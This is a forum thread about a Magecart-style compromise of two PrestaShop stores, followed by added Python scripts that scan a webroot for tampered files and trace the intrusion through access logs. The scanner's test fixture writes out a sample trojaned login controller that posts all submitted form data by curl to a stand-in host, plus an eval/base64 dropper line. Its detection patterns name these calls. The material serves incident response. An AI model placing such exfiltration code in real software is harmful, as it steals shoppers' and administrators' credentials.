Jurist (posted July 15, 2022):

This happened to the 2nd of the stores I take care of on the 2nd day. I am curious if that's a general PrestaShop problem now? The problem is:
- when you go to the admin page of the store and insert correct credentials, nothing happens, the page is just reloaded;
- when you go to the admin page of the store and insert incorrect credentials, there's no error on the page, 500 server error in the JS console.
Either way, you are unable to log in to the store. The resolution of the problem was restoration of half of the store's folders. I was unable to dig in and investigate, which would take time, as I had to have those stores back to work. Restoration of the following folders helped: app, bin, classes, controllers, js, admin, tools, var, vendor, webservice. But I am just concerned now: are we being attacked by someone? Why was one of the files damaged, so that the admin login was no longer working? It happened to 2 separate, completely different stores; the 1st one had a problem on Thursday, the 2nd one on Friday. Same problem, same fix. Can't believe it's just a coincidence. I am looking for help.
masterblaster (posted July 18, 2022):

I had to deal with a similar report lately. Check:
- classes/db/Db.php
- controllers/admin/AdminLoginController.php
before the restoration and see if there are any lines added in the files that send data via PHP curl to a remote server. In which case, yes, you have been attacked by some kind of "Magecart" variant.
Jurist (author, posted July 18, 2022):

Hi @masterblaster, thank you for your reply. I am afraid that we actually have been attacked. The files couldn't damage themselves. Do you know which PS version got rid of that vulnerability? Or does this require a new PR?
masterblaster (posted July 18, 2022):

It's hard to tell; you should check the access logs carefully to understand the attack vector. There may have been a vulnerable/outdated module.
Jurist (author, posted July 18, 2022):

@masterblaster I can confirm that there was a /app/Mage.php file on both servers. There was also /js/vas51cs.js, with a generated name. Looks like a Magecart attack. Which PS version eliminated the vulnerability? Does the malware impact the database data or only the new form users?
masterblaster (posted July 18, 2022):

A list of publicly disclosed PS vulnerabilities is available here; as long as there isn't any new exploit in the wild, I would rather think of an outdated module as an attack vector. Regarding the attack itself, this is known to send plaintext credentials to a remote server + add fake credit card forms during checkout. Anyway, since attackers got into your webspace, the only way to be sure to clean up the threat is to restore a clean backup and remove the attack vector.
Jurist (author, posted July 18, 2022):

@masterblaster thanks for your help. We did restore a large part of the site + removed the files that the script created. We will also add some extra security measures to those websites. I understand how it works with reading the data from forms; I think that didn't happen because there were no registrations between the time that the problem occurred and the time it was removed from the site. Do you know if that script reads data from the database?
masterblaster (posted July 18, 2022):

It seems to me that the main intent of this kind of hack is to steal credit cards. However, core files are also modified to send logins to remote servers, so if you care about your shop, perform a dedicated analysis.
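The file checks described in this thread (added lines in classes/db/Db.php and controllers/admin/AdminLoginController.php that post form data via PHP curl, plus dropped files such as /app/Mage.php and /js/vas51cs.js) can be scripted. The Python below is an added example, not code from the thread or from PrestaShop: it flags PHP files that combine a curl call with a source of submitted input, files using PHP obfuscation calls, core files whose hash differs from a clean release copy, and files in core directories that the clean release does not ship. The stub file contents, the dropper payload and the example.invalid host are constructed for the demonstration; in real use you would point scan_webroot() at the live webroot and build the reference hashes from an untouched copy of the same PrestaShop version.

```python
"""Added example (not from the thread or PrestaShop): triage a PrestaShop
webroot for modified core files, dropped files and curl-based exfiltration.
All sample file contents and paths below are constructed for the demo."""
import hashlib
import os
import re
import tempfile

# A curl call together with a source of submitted form data in the same file is
# the combination that deserves a human look; each alone is common in legitimate
# PrestaShop code (modules call remote APIs, controllers read $_POST).
CURL_RE = re.compile(r"\bcurl_(?:init|exec|setopt)\s*\(")
INPUT_RE = re.compile(r"\$_(?:POST|REQUEST|GET)\b|Tools::getValue\s*\(")
OBFUSC_RE = re.compile(r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\(")
CORE_DIRS = ("app/", "classes/", "controllers/", "js/")

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_php_file(path):
    """Return the list of indicator names found in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        src = f.read()
    hits = []
    if CURL_RE.search(src) and INPUT_RE.search(src):
        hits.append("curl+user-input")
    if OBFUSC_RE.search(src):
        hits.append("obfuscation")
    return hits

def scan_webroot(root, reference_hashes):
    """Walk root and return (suspicious, modified, unexpected).
    reference_hashes maps a relative path to the sha256 of the clean file."""
    suspicious, modified, unexpected = {}, [], []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in reference_hashes:
                if sha256_of(full) != reference_hashes[rel]:
                    modified.append(rel)
            elif rel.startswith(CORE_DIRS):
                unexpected.append(rel)  # not shipped by the clean release
            if name.endswith(".php"):
                hits = scan_php_file(full)
                if hits:
                    suspicious[rel] = hits
    return suspicious, sorted(modified), sorted(unexpected)

# Constructed stand-ins for the real files; the clean versions are stubs.
CLEAN_DB = "<?php\nclass Db { public function connect() { return true; } }\n"
CLEAN_LOGIN = ("<?php\nclass AdminLoginController {\n"
               "  public function processLogin() { $email = Tools::getValue('email'); }\n}\n")
TROJANED_LOGIN = CLEAN_LOGIN + (
    "$ch = curl_init('https://example.invalid/c');\n"  # hypothetical exfil host
    "curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($_POST));\n"
    "curl_exec($ch);\n")
DROPPED_PHP = "<?php eval(base64_decode('ZWNobyAxOw=='));\n"  # constructed dropper

def build_sample_webroot():
    """Create a throwaway webroot mirroring the thread's indicators; return (root, reference)."""
    root = tempfile.mkdtemp(prefix="ps-triage-")
    files = {
        "classes/db/Db.php": CLEAN_DB,
        "controllers/admin/AdminLoginController.php": TROJANED_LOGIN,
        "app/Mage.php": DROPPED_PHP,
        "js/vas51cs.js": "document.forms[0].addEventListener('submit', function(){});\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(content)
    reference = {
        "classes/db/Db.php": hashlib.sha256(CLEAN_DB.encode()).hexdigest(),
        "controllers/admin/AdminLoginController.php": hashlib.sha256(CLEAN_LOGIN.encode()).hexdigest(),
    }
    return root, reference

def demo():
    root, reference = build_sample_webroot()
    return scan_webroot(root, reference)

if __name__ == "__main__":
    suspicious, modified, unexpected = demo()
    print("suspicious:", suspicious)
    print("modified core files:", modified)
    print("unexpected files in core dirs:", unexpected)
```

The hash comparison is the reliable part: a pattern scan only catches the variants it was written for, while a diff against the clean release of the same version catches any edit to a core file. Run it against a copy of the compromised tree taken before the restoration, not against the restored one, or the evidence of which files were changed is gone.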
Jurist (author, posted July 19, 2022):

Hi @masterblaster, thank you for your help. We have restored a large portion of the store, responsible for communicating with the DB etc., and briefly looked at the malicious code, which appears to be reading data from forms on the website and then sends it through PHP curl to some remote server. Do you have any idea how to find out what plugin or file served as an attack vector? I was thinking about checking the request logs; however, due to the large number of users every day, I think it would be difficult to find out.
masterblaster (posted July 21, 2022):

Hello, well, I see no other way than inspecting the logs; given the situation, consider hiring a specialist if you can't handle it.
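The log volume concern raised above is manageable if you pivot on what you already know: the attacker-created paths (/app/Mage.php, /js/vas51cs.js in this thread). The first request to one of them marks when the dropper landed, and everything the same client did shortly before it is the candidate attack vector. The Python below is an added example, not from the thread; the log lines, IP addresses, timestamps and the module path /modules/examplemodule/ajax.php are constructed for the demonstration.

```python
"""Added example (not from the thread): pivot an access log on the first
request to a known attacker-created path. All log lines below are constructed."""
import re
from datetime import datetime, timedelta

# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    e["path"] = e["path"].split("?", 1)[0]  # compare paths without the query string
    return e

def triage(lines, ioc_paths, window=timedelta(hours=24)):
    """Pivot on the earliest request to a known-malicious path.

    Returns the first IOC hit, every client that touched an IOC path, all requests
    those clients made within `window` before the first hit (the attack vector is
    in there), and the subset that were accepted writes under /modules/, which is
    where an outdated module would have been exploited."""
    entries = [e for e in map(parse_line, lines) if e]
    ioc_hits = [e for e in entries if e["path"] in ioc_paths]
    if not ioc_hits:
        return {"first_ioc": None, "ioc_clients": [], "prior_requests": [], "module_writes": []}
    first = min(ioc_hits, key=lambda e: e["ts"])
    clients = {e["ip"] for e in ioc_hits}
    prior = sorted(
        (e for e in entries
         if e["ip"] in clients and first["ts"] - window <= e["ts"] < first["ts"]),
        key=lambda e: e["ts"])
    module_writes = [
        e for e in prior
        if e["path"].startswith("/modules/") and e["method"] in ("POST", "PUT")
        and 200 <= e["status"] < 300]
    return {"first_ioc": first, "ioc_clients": sorted(clients),
            "prior_requests": prior, "module_writes": module_writes}

# Constructed sample: ordinary shopper traffic from 203.0.113.7, an attacker at
# 198.51.100.23 probing and posting to a hypothetical module, then the dropper.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jul/2022:09:12:01 +0200] "GET /index.php?id_product=12&controller=product HTTP/1.1" 200 18230
198.51.100.23 - - [14/Jul/2022:09:40:11 +0200] "GET /modules/examplemodule/ajax.php HTTP/1.1" 200 412
198.51.100.23 - - [14/Jul/2022:09:40:19 +0200] "POST /modules/examplemodule/ajax.php HTTP/1.1" 200 15
203.0.113.7 - - [14/Jul/2022:09:41:00 +0200] "POST /index.php?controller=authentication HTTP/1.1" 302 0
198.51.100.23 - - [14/Jul/2022:09:40:41 +0200] "GET /app/Mage.php HTTP/1.1" 200 2
198.51.100.23 - - [14/Jul/2022:09:45:02 +0200] "GET /js/vas51cs.js HTTP/1.1" 200 3310
this line is deliberately malformed and is skipped
"""
IOC_PATHS = {"/app/Mage.php", "/js/vas51cs.js"}

def demo():
    return triage(SAMPLE_LOG.splitlines(), IOC_PATHS)

if __name__ == "__main__":
    r = demo()
    print("first IOC hit:", r["first_ioc"]["ts"], r["first_ioc"]["path"])
    print("clients touching IOC paths:", r["ioc_clients"])
    for e in r["module_writes"]:
        print("candidate vector:", e["ts"], e["method"], e["path"], e["status"])
```

On a real server, feed the function the rotated log files covering the days before the first dropper hit rather than a string, and keep in mind that the first request to the dropper may come from a different address than the one that planted it, so widen the client set to anything that wrote under /modules/ in the window if the pivot turns up nothing. If the web log shows no vector at all, the next places to look are the FTP/SFTP and SSH logs and the back-office login history, since a stolen admin or hosting credential leaves no exploit trace in the access log.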